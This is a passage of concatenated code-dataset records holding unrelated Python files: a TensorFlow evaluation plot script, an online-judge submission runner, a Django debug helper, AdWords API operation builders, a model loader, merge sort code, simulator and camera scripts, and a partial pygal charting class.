config\nfrom mpl_toolkits.mplot3d import Axes3D\n\nFIG_DPI = 300\nalpha = 2.\nparallel_iterations=30\nswap_memory=True\n\nmean = np.array([-1.0736032, -1.0666735, 23.519363],dtype=np.float32)\nstd = np.array([7.8522167, 8.973377 , 8.675985],dtype=np.float32)\n\nconfig.num_samples = 1\nconfig.batch_size = 1\nconfig.logdir=\"./chkpts/VDRNN_normalized-elbo-600-0-obs123_noise0.0_10-normalize_data-True-raw_sigma_bias-0.25-stochastic-True-sigma_max-10.0\"\n\ntf.Graph().as_default()\nglobal_step = tf.train.get_or_create_global_step()\ninputs, targets, lengths, model = runners.create_dataset_and_model(config, \n shuffle=False,\n repeat=False)\n\nwith tf.name_scope(\"Generative_cell\"):\n max_seq_length = 2000\n ta_names_ = ['gen_data']\n tas_ = [tf.TensorArray(tf.float32, max_seq_length, name='%s_ta' % n)\n for n in ta_names_]\n \n tmp = tf.constant([-2.0780482 , 2.2406886 , 27.08631],dtype=tf.float32)\n# tmp = tf.constant([-6.1996655, -3.5407534, 27.89102],dtype=tf.float32)\n if config.normalize_data:\n tmp = (tmp-mean)/std\n init_states_ = 1*tf.expand_dims(tmp, axis=0)\n t0 = tf.constant(0, tf.int32)\n \n def while_predicate_(t, *unused_args):\n return t < max_seq_length\n def while_step(t, while_inputs, tas):\n next_state, _ = model.prior.binn(while_inputs)\n ta_updates_ = [next_state]\n new_tas = [ta.write(t, x) for ta, x in zip(tas, ta_updates_)]\n return t + 1, next_state, new_tas\n _, _, tas_ = tf.while_loop(while_predicate_,\n while_step,\n loop_vars=(t0, init_states_, tas_),\n parallel_iterations=parallel_iterations,\n swap_memory=swap_memory)\n gen_data = [x.stack() for x in tas_][0]\n \nsaver = tf.train.Saver()\nsess = tf.train.SingularMonitoredSession()\nrunners.wait_for_checkpoint(saver, sess, config.logdir) \nstep = sess.run(global_step)\n\ninp_np, tar_np, len_np, gen_np =\\\n sess.run([inputs,targets, lengths, gen_data])\ninp_np = np.squeeze(inp_np)\ntar_np = np.squeeze(tar_np)\n#gen_np = np.squeeze(gen_np)\n\n\nfigname = config.model_name + \", \"+config.dataset_path.split(\"/\")[2]\nFIG_DPI = 100\n\nplt.figure(figsize=(1920/FIG_DPI, 1080/FIG_DPI), dpi=FIG_DPI)\nfor d_i in range(3):\n plt.plot(gen_np[:1000,0,d_i])\nplt.title(figname)\nplt.savefig(\"./results/\"+figname+\".png\", dpi=FIG_DPI)\n\n# Attractor\nfig = plt.figure(figsize=(1920/FIG_DPI, 1080/FIG_DPI), dpi=FIG_DPI)\nax=fig.gca(projection='3d')\nline1,=ax.plot(gen_np[:1000,0,0],gen_np[:1000,0,1],gen_np[:1000,0,2],'r')\nax.set_xlabel('$x_1$');ax.set_ylabel('$x_2$');ax.set_zlabel('$x_3$')\nplt.title(figname)\n#plt.savefig(\"./results/\"+figname+\"_attractor.png\", dpi=FIG_DPI)\nplt.savefig(\"./results/\"+os.path.basename(config.logdir)+\".png\", dpi=FIG_DPI)\nplt.show()\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"8499189","text":"import itertools\nimport os\nimport os.path\nimport shlex\nimport subprocess\nimport threading\nimport time\n\nfrom app import app\n\n\nALLOWED_EXTENSIONS = ['java', 'c', 'cpp', 'py', 'go']\nCOMPILE_COMMAND = {\n 'java': 'javac {0}.java',\n 'py': None,\n 'c': 'gcc {0}.c -o {0}',\n 'cpp': 'g++ {0}.cpp -o {0}',\n 'go': 'go build -o {0} {0}.go'\n}\nRUN_COMMAND = {\n 'java': 'java -cp {0}/ {1}',\n 'py': 'python {0}/{1}.py',\n 'c': '{0}/{1}',\n 'cpp': '{0}/{1}',\n 'go': '{0}/{1}'\n}\nTIMEOUT_MULTIPLIER = {\n 'java': 1.5,\n 'py': 2,\n 'c': 1,\n 'cpp': 1,\n 'go': 1\n}\nCOMPILATION_ERROR = 1\nCOMPILATION_SUCCESS = 2\nRUNTIME_ERROR = 3\nTIMELIMIT_EXCEEDED = 4\nWRONG_ANSWER = 5\nCORRECT_ANSWER = 6\n\n\ndef allowed_filetype(filename):\n return ('.' in filename and\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS)\n\n\ndef directory_for_submission(submission):\n return os.path.join(\n app.config['DATA_FOLDER'], 'submits', str(submission.job))\n\n\ndef directory_for_problem(submission):\n return os.path.join(app.config['DATA_FOLDER'], 'problems', str(submission.pid))\n\n\ndef evaluate(submission, uploaded_file, time_limit=10):\n \"\"\"Attempts to compile (if necessary) then execute a given file.\n\n :param submission: the newly created submission\n :param uploaded_file: the uploaded file\n :return: the status of the submission (one of the status constants above)\n \"\"\"\n directory = directory_for_submission(submission)\n os.mkdir(directory)\n uploaded_file.save(os.path.join(directory, uploaded_file.filename))\n status = compile_submission(submission, uploaded_file)\n if status == COMPILATION_SUCCESS:\n status = execute_submission(submission, uploaded_file, time_limit)\n return status\n\n\ndef compile_submission(submission, uploaded_file):\n \"\"\"Compile the submission.\"\"\"\n directory = directory_for_submission(submission)\n filename = uploaded_file.filename\n name, ext = filename.rsplit('.', 1)\n # Don't compile file types that we can't compile.\n if COMPILE_COMMAND[ext] is None:\n return COMPILATION_SUCCESS\n result = subprocess.call(\n shlex.split(COMPILE_COMMAND[ext].format(os.path.join(directory, name))),\n stderr=open(os.path.join(directory, 'error.txt'), 'w')\n )\n if result == 0:\n return COMPILATION_SUCCESS\n else:\n submission.update_status('compile')\n submission.emit_status('compile', -1)\n return COMPILATION_ERROR\n\n\ndef execute_submission(submission, uploaded_file, time_limit):\n \"\"\"Run the submission.\n\n TODO(djshuckerow): This method magically got out-of-hand. Refactor.\n This method:\n 1. detects all the input files associated with this problem.\n 2. runs the submission with each input file\n 3. checks the performance of the submission for errors (TLE, RTE, etc)\n 4. compares the output against correct test output\n \"\"\"\n # Initial setup\n problem = submission.get_problem()\n problem_directory = directory_for_problem(submission)\n submission_directory = directory_for_submission(submission)\n filename = uploaded_file.filename\n name, ext = filename.rsplit('.', 1)\n input_path = os.path.join(problem_directory, 'in')\n output_path = os.path.join(problem_directory, 'out')\n\n # Iterate over all the input files.\n for fname in os.listdir(input_path):\n f = os.path.join(input_path, fname)\n if os.path.isfile(f):\n # Prepare to run the test file.\n test_number = int(fname.split('.')[0].strip('in'))\n out_file = 'out{0}.txt'.format(test_number)\n submission.emit_status('running', test_number)\n max_runtime = time_limit * TIMEOUT_MULTIPLIER[ext]\n execution = JudgementThread(\n submission, uploaded_file, f, out_file, max_runtime)\n start_time = time.time()\n execution.start()\n execution.join(max_runtime)\n\n # Check the execution for timeouts and runtime errors.\n if time.time() >= start_time + max_runtime:\n execution.process.kill()\n submission.update_status('timeout')\n submission.emit_status('timeout', test_number)\n return TIMELIMIT_EXCEEDED\n elif execution.process.poll() != 0:\n submission.update_status('runtime')\n submission.emit_status('runtime', test_number)\n return RUNTIME_ERROR\n result_path = os.path.join(submission_directory, 'out')\n\n # The execution is completed. Check its correctness.\n with open(os.path.join(output_path, out_file)) as correct_result, \\\n open(os.path.join(result_path, out_file)) as submission_result:\n correct_lines = correct_result.readlines()\n submission_lines = submission_result.readlines()\n if len(submission_lines) != len(correct_lines):\n submission.update_status('wrong')\n submission.emit_status('incorrect', test_number)\n return WRONG_ANSWER\n\n # Use itertools.izip instead of zip to save memory.\n for gl, sl in itertools.izip(correct_lines, submission_lines):\n if gl.rstrip('\\r\\n') != sl.rstrip('\\r\\n'):\n submission.update_status('wrong')\n submission.emit_status('incorrect', test_number)\n return WRONG_ANSWER\n\n # The answer is correct if all the tests complete without any failure.\n submission.update_status('good')\n submission.emit_status('correct', test_number)\n return CORRECT_ANSWER\n\n\nclass JudgementThread(threading.Thread):\n \"\"\"Pass judgement on a submission by running it on a thread.\n\n This runs a separate thread containing the submission in a subprocess.\n\n Timeout is tricky to handle -- thread.join(timeout) doesn't appear to\n work properly inside of Flask.\n \"\"\"\n\n def __init__(self, submit, uploaded_file, in_file, out_file, limit):\n \"\"\"Create the JudgementThread.\n\n :param submit: the newly created submission\n :param uploaded_file: the file uploaded from flask\n :param in_file: the input file that is going to be read in\n :param out_file: the output file that is going to be written to\n :param limit: the time limit for execution.\n \"\"\"\n threading.Thread.__init__(self)\n self.submit = submit\n self.uploaded_file = uploaded_file\n self.in_file = in_file\n self.out_file = out_file\n self.process = None\n self.limit = limit\n # Final setup.\n directory = directory_for_submission(submit)\n output_path = os.path.join(directory, 'out')\n if (not os.path.exists(output_path)):\n os.mkdir(output_path)\n\n def run(self):\n \"\"\"Execute a subprocess and keep the pointer to that subprocess.\"\"\"\n start_time = time.time()\n self.process = self.judge_as_subprocess()\n # TODO(djshuckerow): Get this thread to join() properly.\n while self.process.poll() is None:\n time.sleep(0.1)\n if time.time() > start_time + self.limit:\n # The try is to avoid a race condition where the process\n # finishes between the if and the kill statements.\n try:\n self.process.kill()\n except:\n pass\n\n def judge_as_subprocess(self):\n \"\"\"Run the program to judge as a subprocess.\n\n This routes the output to /data/submits/job/out. The input is read from\n the location at which it is supposed to be found:\n\n \n /data/problems/pid/in(test_num).txt.\n \n \"\"\"\n submit, uploaded_file = self.submit, self.uploaded_file\n in_file, out_file = self.in_file, self.out_file\n directory = directory_for_submission(submit)\n filename = uploaded_file.filename\n name, ext = filename.rsplit('.', 1)\n input_path = os.path.join(directory_for_problem(submit), 'in')\n output_path = os.path.join(directory, 'out')\n return subprocess.Popen(\n shlex.split(RUN_COMMAND[ext].format(directory, name, ext)),\n stdin=open(os.path.join(input_path, in_file)),\n stdout=open(os.path.join(output_path, out_file), 'w'),\n stderr=open(os.path.join(directory, 'error.txt'), 'w'))\n","sub_path":"auacm/app/modules/submission_manager/judge.py","file_name":"judge.py","file_ext":"py","file_size_in_byte":8474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"93187671","text":"\"\"\"connectionlist create debug mode\n\"\"\"\nimport logging.handlers\nimport requests\n\nfrom rest_framework.response import Response\nfrom rest_framework.views import status\n\nfrom webapp.libs.get_available_port import GetAvailablePort\nfrom webapp.models import Operation, OperationHistory, Robot\nfrom webapp.views import walk, CELERY_APP\n\n# set logger\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger('connectionlist_debug_mode')\n\n# create a file handler\nhandler = logging.handlers.RotatingFileHandler('connectionlist_debug_mode.log', maxBytes=10485760,\n backupCount=10, encoding='utf-8')\nhandler.setLevel(logging.INFO)\n\n# create a logging format\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\n\n# add the handlers to the logger\nlogger.addHandler(handler)\n\n\nclass CreateDebugMode(object):\n\n @staticmethod\n def validate_input_to_create_debug_mode(request_data):\n \"\"\"Debug Process\n\n Args:\n request: request data\n\n Returns:\n json:\n east (string): east port number\n west (string): west port number\n status (string): status code\n number (string): number of sequence\n stops (string): current sequence\n action (string): action type\n \"\"\"\n\n east, west = GetAvailablePort.get_available_port(request_data)\n logger.info('debug %s - %s', east, west)\n\n # Validate input\n if east is None:\n logger.error('debug: error:no east port number {} request:{}'.format(east, request_data))\n return Response('No east port number ' + str(east), content_type=\"text/plain\")\n\n if west is None:\n logger.error('debug: error:no west port number {} request:{}'.format(west, request_data))\n return Response('No west port number ' + str(west), content_type=\"text/plain\")\n\n # create debug mode\n CreateDebugMode.create_debug(request_data, east, west)\n\n logger.info('debug: response method return data: {}'.format(request_data))\n return Response(request_data, status=status.HTTP_200_OK)\n\n @staticmethod\n def create_debug(request_data, east, west):\n \"\"\"Create debug Process in database\n\n Args:\n request: request data\n east(string): east's port from debug()\n west(string): west's port from debug()\n \"\"\"\n\n # Validate input\n if 'number' in request_data and 'stops' in request_data:\n action = request_data['action']\n number = request_data['number']\n stops = request_data['stops']\n\n else:\n number = None\n stops = None\n\n if stops and number:\n payload = {'east': east.number, 'west': west.number, 'action': str(action), 'stops': str(stops),\n 'no': str(number)}\n\n else:\n return_data = ({'status': 'error', 'error': 'Invalid Debug Input'})\n return Response(return_data, status=status.HTTP_200_OK)\n\n # Validate using dummy\n if walk.is_dummy():\n resp = walk.debug(payload)\n\n else:\n resp = requests.post(CELERY_APP + '/debug', data=payload)\n\n uuid = resp.text\n logger.info('%s %s E%s W%s stops:%s no:%s', uuid, action, east.number, west.number, stops, number)\n operations = Operation.objects.all()\n robotnumber = ''\n\n robots = Robot.objects.all()\n for r in robots:\n robotnumber = r.robot_number\n\n if len(operations) > 0:\n operations.delete()\n operations = Operation.objects.create(uuid=uuid, robotnumber=robotnumber, status='pending',\n request=str(payload))\n operations.save()\n\n else:\n operations = Operation.objects.create(robotnumber=robotnumber, uuid=uuid, status='pending',\n request=str(payload))\n operations.save()\n\n operationhistorys = OperationHistory.objects.create(robotnumber=robotnumber, uuid=uuid, status='pending',\n request=str(payload))\n operationhistorys.save()","sub_path":"backend/webapp/libs/connectionlist_debug_mode.py","file_name":"connectionlist_debug_mode.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"17550724","text":"import logging\nimport uuid\n\nfrom .. import utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef add_label_operation(label):\n yield {\n 'xsi_type': 'LabelOperation',\n 'operator': 'ADD',\n 'operand': {\n 'xsi_type': 'TextLabel',\n 'name': label\n }\n }\n\n\ndef add_adgroup_label_operation(adgroup_id, label_id):\n yield {\n 'xsi_type': 'AdGroupLabelOperation',\n 'operator': 'ADD',\n 'operand': {\n 'xsi_type': 'AdGroupLabel',\n 'adGroupId': adgroup_id,\n 'labelId': label_id\n }\n }\n\n\ndef set_adgroup_name_operation(adgroup_id, name):\n yield {\n 'xsi_type': 'AdGroupOperation',\n 'operator': 'SET',\n 'operand': {\n 'xsi_type': 'AdGroup',\n 'id': adgroup_id,\n 'name': name\n }\n }\n\n\ndef apply_new_budget(campaign_id, amount=None, budget_id=None, id_builder=None):\n if not budget_id:\n logger.debug(\"Create a budget using 'amount' %s\" % amount)\n if not id_builder:\n raise RuntimeError(\"'id_builder' callable should be provided for budgets to be created\")\n budget_id = id_builder()\n yield add_budget(amount, budget_id)\n\n logger.debug(\"Apply budget '%s' to campaign '%s'\" % (budget_id, campaign_id))\n yield set_campaign_budget(budget_id, campaign_id)\n\n\ndef add_ad(adgroup_id: 'Long',\n headline1: 'String',\n headline2: 'String',\n description: 'String',\n urls: 'String',\n ad_id: 'Long' = None,\n adtype: 'String' = 'ExpandedTextAd',\n **kwargs):\n ad_dict = build_ad(headline1, headline2, description, urls, ad_id, adtype)\n operation = {\n 'xsi_type': 'AdGroupAdOperation',\n 'operand': {\n # https://developers.google.com/adwords/api/docs/reference/v201705/AdGroupAdService.AdGroupAd\n 'xsi_type': 'AdGroupAd',\n 'adGroupId': adgroup_id,\n 'ad': ad_dict,\n 'status': 'PAUSED',\n # TODO: 'labels': [],\n },\n 'operator': 'ADD'\n }\n return operation\n\n\ndef build_ad(headline1, headline2, description, urls, ad_id=None, adtype='ExpandedTextAd'):\n result = {\n 'xsi_type': adtype,\n 'headlinePart1': headline1,\n 'headlinePart2': headline2,\n 'description': description,\n 'finalUrls': list(urls),\n }\n if ad_id:\n result['id'] = ad_id\n return result\n\n\ndef add_restriction(adgroup_id, restriction_dict, effect='SHOW'):\n \"\"\"\n A restriction to display an Ad. For example, a Keyword dict.\n If 'effect' is \"HIDE\", will enforce the Ad to NOT be displayed\n when the restriction got matched.\n \"\"\"\n if effect.upper() == 'SHOW':\n operand_type = 'BiddableAdGroupCriterion'\n elif effect.upper() == 'HIDE':\n operand_type = 'NegativeAdGroupCriterion'\n else:\n raise NotImplementedError(\"Desired 'effect' was not recognized\")\n\n operation = {\n 'xsi_type': 'AdGroupCriterionOperation',\n 'operand': {\n 'xsi_type': operand_type,\n 'adGroupId': adgroup_id,\n 'criterion': restriction_dict,\n },\n 'operator': 'ADD'\n }\n return operation\n\n\ndef build_keyword(text, keyword_id=None, match='BROAD'):\n result = {\n 'xsi_type': 'Keyword',\n 'text': text,\n 'matchType': 'BROAD', # Only EXACT, PHRASE or BROAD\n }\n if keyword_id:\n result['id'] = keyword_id\n return result\n\n\ndef add_campaign(campaign_id: 'Long',\n campaign_name: 'String',\n budget_id: 'Long' = None,\n status: 'String' = 'PAUSED',\n advertising_channel: 'String' = 'SEARCH',\n operator: 'String' = 'ADD',\n **kwargs):\n bidding_strategy = build_new_bidding_strategy_configuration(with_bids=False, strategy_type='MANUAL_CPC')\n operation = {\n 'xsi_type': 'CampaignOperation',\n 'operator': operator.upper(),\n 'operand': {\n # https://developers.google.com/adwords/api/docs/reference/v201705/CampaignService.Campaign\n 'xsi_type': 'Campaign',\n 'id': campaign_id,\n 'name': campaign_name,\n\n ## From: https://developers.google.com/adwords/api/docs/samples/python/campaign-management#add-complete-campaigns-using-batch-jobs\n # 'advertisingChannelType': 'SEARCH',\n # Recommendation: Set the campaign to PAUSED when creating it to\n # stop the ads from immediately serving. Set to ENABLED once\n # you've added targeting and the ads are ready to serve.\n 'status': status,\n # Note that only the budgetId is required\n 'biddingStrategyConfiguration': bidding_strategy,\n 'advertisingChannelType': advertising_channel,\n },\n }\n if budget_id:\n operation['operand']['budget'] = {'budgetId': budget_id}\n return operation\n\n\ndef add_account(campaign_id, campaign_name):\n operation = {\n 'xsi_type': 'CampaignOperation',\n 'operator': 'ADD',\n 'operand': {\n # https://developers.google.com/adwords/api/docs/reference/v201705/CampaignService.Campaign\n 'xsi_type': 'Campaign',\n 'id': campaign_id,\n 'name': campaign_name,\n\n ## From: https://developers.google.com/adwords/api/docs/samples/python/campaign-management#add-complete-campaigns-using-batch-jobs\n # 'advertisingChannelType': 'SEARCH',\n # Recommendation: Set the campaign to PAUSED when creating it to\n # stop the ads from immediately serving. Set to ENABLED once\n # you've added targeting and the ads are ready to serve.\n 'status': 'PAUSED',\n # Note that only the budgetId is required\n # 'budget': {\n # 'budgetId': budget_id\n # },\n # 'biddingStrategyConfiguration': {\n # 'biddingStrategyType': 'MANUAL_CPC'\n # }\n },\n }\n return operation\n\n\ndef set_campaign_budget(budget_id, campaign_id):\n return {\n 'xsi_type': 'CampaignOperation',\n 'operator': 'SET',\n\n 'operand': {\n 'id': int(campaign_id),\n 'budget': {\n 'xsi_type': 'Budget',\n 'budgetId': int(budget_id),\n },\n },\n }\n\n\ndef add_budget(budget: 'Money',\n budget_id: 'Long',\n delivery: 'String' = 'ACCELERATED',\n budget_name: 'String' = None,\n **kwargs):\n operation = {\n 'xsi_type': 'BudgetOperation',\n 'operator': 'ADD',\n\n 'operand': {\n 'xsi_type': 'Budget',\n 'budgetId': int(budget_id),\n 'amount': build_money(budget),\n },\n }\n\n if delivery:\n operation['operand']['deliveryMethod'] = delivery\n\n if budget_name:\n operation['operand'].update({\n 'isExplicitlyShared': True,\n 'name': budget_name\n })\n else:\n operation['operand']['isExplicitlyShared'] = False\n\n return operation\n\n\ndef build_money(money):\n return {\n 'xsi_type': 'Money',\n 'microAmount': money,\n }\n\n\ndef add_biddable_adgroup_criterion_operation(adgroup_id,\n operator,\n xsi_type,\n criteria_id=None,\n criterion_params={},\n **kwargs):\n criterion = {'xsi_type': xsi_type}\n if criteria_id:\n criterion['id'] = criteria_id\n for key in criterion_params:\n criterion[key] = criterion_params[key]\n\n operand = {\n 'xsi_type': 'BiddableAdGroupCriterion',\n 'criterion': criterion,\n 'adGroupId': adgroup_id,\n }\n for key in kwargs:\n operand[key] = kwargs[key]\n\n operation = {\n 'xsi_type': 'AdGroupCriterionOperation',\n 'operand': operand,\n 'operator': operator\n }\n return operation\n\n\ndef build_new_bid_type(xsi_type, value):\n bid_type = {\n 'xsi_type': xsi_type,\n 'bid': {\n 'xsi_type': 'Money',\n 'microAmount': value\n }\n }\n return bid_type\n\n\ndef build_new_bidding_strategy_configuration(with_bids=True, strategy_type=None):\n bidding_strategy = {'xsi_type': 'BiddingStrategyConfiguration'}\n if with_bids:\n bidding_strategy['bids'] = []\n if strategy_type:\n bidding_strategy['biddingStrategyType'] = strategy_type\n return bidding_strategy\n\n\ndef add_keyword_cpc_bid_adjustment_operation(adgroup_id,\n criteria_id,\n value):\n bid_operation = add_biddable_adgroup_criterion_operation(\n adgroup_id,\n 'SET',\n 'Keyword',\n criteria_id\n )\n bidding_strategy = build_new_bidding_strategy_configuration()\n bid_operation['operand']['biddingStrategyConfiguration'] = bidding_strategy\n bid_type = build_new_bid_type('CpcBid', value)\n bid_operation['operand']['biddingStrategyConfiguration']['bids'].append(bid_type)\n return bid_operation\n\n\ndef add_new_keyword_operation(adgroup_id: 'Long' = None,\n text: 'String' = None,\n keyword_match_type: 'String' = None,\n status: 'String' = 'PAUSED',\n cpc_bid: 'Bid' = None,\n **kwargs):\n new_keyword_operation = add_biddable_adgroup_criterion_operation(\n adgroup_id,\n 'ADD',\n 'Keyword',\n criterion_params={\n 'text': text,\n 'matchType': keyword_match_type.upper(),\n },\n userStatus=status.upper()\n )\n bidding_strategy = build_new_bidding_strategy_configuration()\n new_keyword_operation['operand']['biddingStrategyConfiguration'] = bidding_strategy\n bid_type = build_new_bid_type('CpcBid', cpc_bid)\n new_keyword_operation['operand']['biddingStrategyConfiguration']['bids'].append(bid_type)\n return new_keyword_operation\n\n\ndef add_adgroup(campaign_id: 'Long',\n adgroup_id: 'Long',\n adgroup_name: 'String',\n status: 'String' ='PAUSED',\n operator: 'String' ='ADD',\n **kwargs):\n operation = {\n 'xsi_type': 'AdGroupOperation',\n 'operand': {\n # https://developers.google.com/adwords/api/docs/reference/v201705/AdGroupService.AdGroup\n 'xsi_type': 'AdGroup',\n 'campaignId': campaign_id,\n 'id': adgroup_id,\n 'name': adgroup_name,\n 'status': status,\n },\n 'operator': operator,\n }\n return operation\n\n\ndef add_adgroup_cpc_bid_adjustment_operation(campaign_id,\n adgroup_id,\n value):\n bid_operation = add_adgroup(campaign_id,\n adgroup_id,\n 'SET')\n bidding_strategy = build_new_bidding_strategy_configuration()\n bidding_strategy['bids'].append(build_new_bid_type('CpcBid', value))\n bid_operation['operand']['biddingStrategyConfiguration'] = bidding_strategy\n return bid_operation\n","sub_path":"adwords_client/adwordsapi/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":11409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"376699658","text":"import argparse\nimport os\nimport glob\nimport re\nimport numpy as np\nfrom src.models import predict_model, seq2seq\nfrom src.data.word_utils import Vocab\nimport logging\n\ndef create_model_loader_args(parser):\n parser.add_argument(\n '--model_specs',\n help='Experiment number to load model and spec for',\n default='highest',\n )\n parser.add_argument(\n '--model',\n help='Path to saved model weights, must be compatiable with experiment spec file',\n default='latest',\n )\n parser.add_argument(\n '--data_specs',\n help='Path to yaml file for data specification',\n default='specs/data_specs.yaml',\n )\n\n return parser\n\ndef load_model_from_args(args):\n\n if args.model_specs == 'highest':\n # Find all experiment spec files\n experiment_specs = glob.glob(\"specs/exp*.yaml\")\n # Get spec file with highest number\n file_nums = []\n for i in experiment_specs:\n experiment_nums = re.search(\"(\\d+).yaml$\", i) # NOQA\n file_nums.append(int(experiment_nums.group(1)))\n specs_filepath = experiment_specs[np.argmax(file_nums)]\n\n else:\n specs_filepath = args.model_specs\n\n specs = predict_model.load_yaml(specs_filepath)\n\n exp = re.search(\"(exp\\d+)\", specs_filepath).group(1) # NOQA\n checkpoint_dir = f\"models/checkpoints/{exp}\"\n vocab_filepath = os.path.join(checkpoint_dir, 'vocab.json')\n vocab = Vocab(vocab_filepath)\n\n model, encoder_model, decoder_model = seq2seq.build_model(**specs['model_params'], vocab_size=len(vocab))\n\n log(f'Loaded model using {specs_filepath}')\n\n if args.model == 'latest':\n weights_checkpoint_filepath = predict_model.latest_checkpoint(checkpoint_dir)\n log(f'Loaded latest weights from {weights_checkpoint_filepath}')\n else:\n weights_checkpoint_filepath = args.model\n try:\n log(f'Loaded model weights from {weights_checkpoint_filepath}')\n except Exception:\n log(f\"Couldn't find model weights at {weights_checkpoint_filepath}\")\n\n model.load_weights(weights_checkpoint_filepath)\n\n return model, encoder_model, decoder_model, vocab_filepath, specs_filepath\n\n\ndef log(message):\n logger = logging.getLogger(__name__)\n logger.info(message)\n\ndef create_inference_args(parser):\n parser.add_argument('--method', help='Inference method', default='beam_search')\n return parser\n","sub_path":"src/cli/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"538487783","text":"import random\nimport time\n\n\ndef merge_sort(m):\n if len(m) <= 1 :\n return m\n\n mid = len(m) // 2\n\n left = merge_sort(m[:mid])\n right = merge_sort(m[mid:])\n\n result = []\n while len(left) > 0 and len(right) > 0 :\n if left[0] <= right[0] :\n result.append(left.pop(0))\n else :\n result.append(right.pop(0))\n # if len(left) > 0 :\n # result.extend(left)\n # if len(right) > 0 :\n # result.extend(right)\n\n # if len(left) > 0 :\n # for i in range(len(left)):\n # result.append(left.pop(0))\n # if len(right) > 0 :\n # for i in range(len(right)):\n # result.append(right.pop(0))\n\n # if len(left) > 0 :\n # result += left\n #\n # if len(right) > 0 :\n # result += right\n\n\n return result\n\n\ndef merge_sort1(m):\n if len(m) <= 1:\n return m\n\n left = merge_sort1(m[:len(m)//2])\n right = merge_sort1(m[len(m)//2:])\n\n i, j, k = 0, 0, 0\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n m[k] = left[i]\n i += 1\n else:\n m[k] = right[j]\n j += 1\n k += 1\n\n if i == len(left): #만약 left의 원소를 모두 채웠고, right가 남아있을 때.\n while j < len(right):\n m[k] = right[j]\n j += 1\n k += 1\n elif j == len(right): #만약 right의 원소를 모두 채웠고, left가 남아있을 때.\n while i < len(left):\n m[k] = left[i]\n i += 1\n k += 1\n return m\n\narr = [random.randint(1,100) for _ in range(1000000)]\n\n# arr = [69, 10, 30, 2, 16, 8, 31, 22]\n\narr1 = arr[:]\n\nst = time.time()\nprint( merge_sort(arr)[:10] )\nprint(time.time() - st)\n\nst = time.time()\nprint( merge_sort1(arr1)[:10] )\nprint(time.time() - st)\n\n","sub_path":"Algorithm and Data Structure/Algorithm Problem Solving/SW 문제해결 기본/p373_리스트_연습문제1_병합정렬.py","file_name":"p373_리스트_연습문제1_병합정렬.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"367305053","text":"\"\"\"\n.. module:: west_coast_random\n :platform: Windows\n :synopsis: Example code making a scenario in west_coast_usa and having the\n vehicle span the map while emitting Lidar.\n\n.. moduleauthor:: Marc Müller \n\n\"\"\"\nimport mmap\nimport random\nimport sys\n\nfrom time import sleep\n\nimport numpy as np\n\nfrom beamngpy import BeamNGpy, Scenario, Vehicle, setup_logging\nfrom beamngpy.sensors import Lidar\n\n\ndef main():\n random.seed(1703)\n setup_logging()\n\n beamng = BeamNGpy('localhost', 64256)\n bng = beamng.open(launch=True)\n\n scenario = Scenario('west_coast_usa', 'lidar_demo',\n description='Spanning the map with a lidar sensor')\n\n vehicle = Vehicle('ego_vehicle', model='etk800',\n licence='RED', color='Red')\n\n lidar = Lidar(offset=(0, 0, 1.6))\n vehicle.attach_sensor('lidar', lidar)\n\n scenario.add_vehicle(vehicle, pos=(-717.121, 101, 118.675),\n rot=None, rot_quat=(0, 0, 0.3826834, 0.9238795))\n scenario.make(bng)\n\n try:\n bng.set_deterministic() # Set simulator to be deterministic\n bng.set_steps_per_second(60) # With 60hz temporal resolution\n\n bng.load_scenario(scenario)\n bng.hide_hud()\n bng.start_scenario()\n\n vehicle.ai_set_mode('span')\n print('Driving around for 60 seconds...')\n sleep(60)\n finally:\n bng.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/west_coast_lidar.py","file_name":"west_coast_lidar.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"349980909","text":"from time import sleep\nfrom picamera import PiCamera\n\ncamera = PiCamera()\n\ncamera.resolution = (3280,2464)\n\n'''camera.start_preview()'''\n\n\nsleep(1)\nfor filename in camera.capture_continuous('timelapse/img{counter:03d}.jpg'):\n print('Captured %s' % filename)\n sleep(120) # wait 5 minutes\n","sub_path":"camera-module/timelapse.py","file_name":"timelapse.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"248539904","text":"import pygal\nfrom pygal.style import Style\n\nclass Chart:\n\tdef __init__(self, database):\n\t\tself.db = database\n\t\tself.custom_Style = Style(colors=['rgb(0, 204, 0)','rgb(0, 0, 153)','rgb(204, 51, 0)'])\n\t\t\n\tdef make_Day_Chart(self, day, path=''):\n\t\tquery = (\"SELECT TIME(date), temp_in, temp_out \"\n\t\t\t\t \"FROM ( SELECT @row := @row + 1 as rownum, date, temp_in, temp_out \"\n\t\t\t\t \"FROM ( SELECT @row := 0) r, temperature ) ranked \"\n\t\t\t\t \"WHERE rownum %2 = 1 AND Date(date) = '\" + str(day) + \"'\")\n\t\tresults = self.db.execute_Query(query)\n\t\tchart = pygal.TimeDeltaLine(x_label_rotation=25,interpolate='cubic',fill=True)\n\t\tchart.title = \"Day: \" + str(day)\n\t\t\n\t\thome = [[r[0], r[1]] for r in results]\n\t\tout = [[r[0], r[2]] for r in results]\n\t\tchart.add('Home', home)\n\t\tchart.add('Outside', out)\n\t\tif path:\n\t\t\tprint(\"try to save 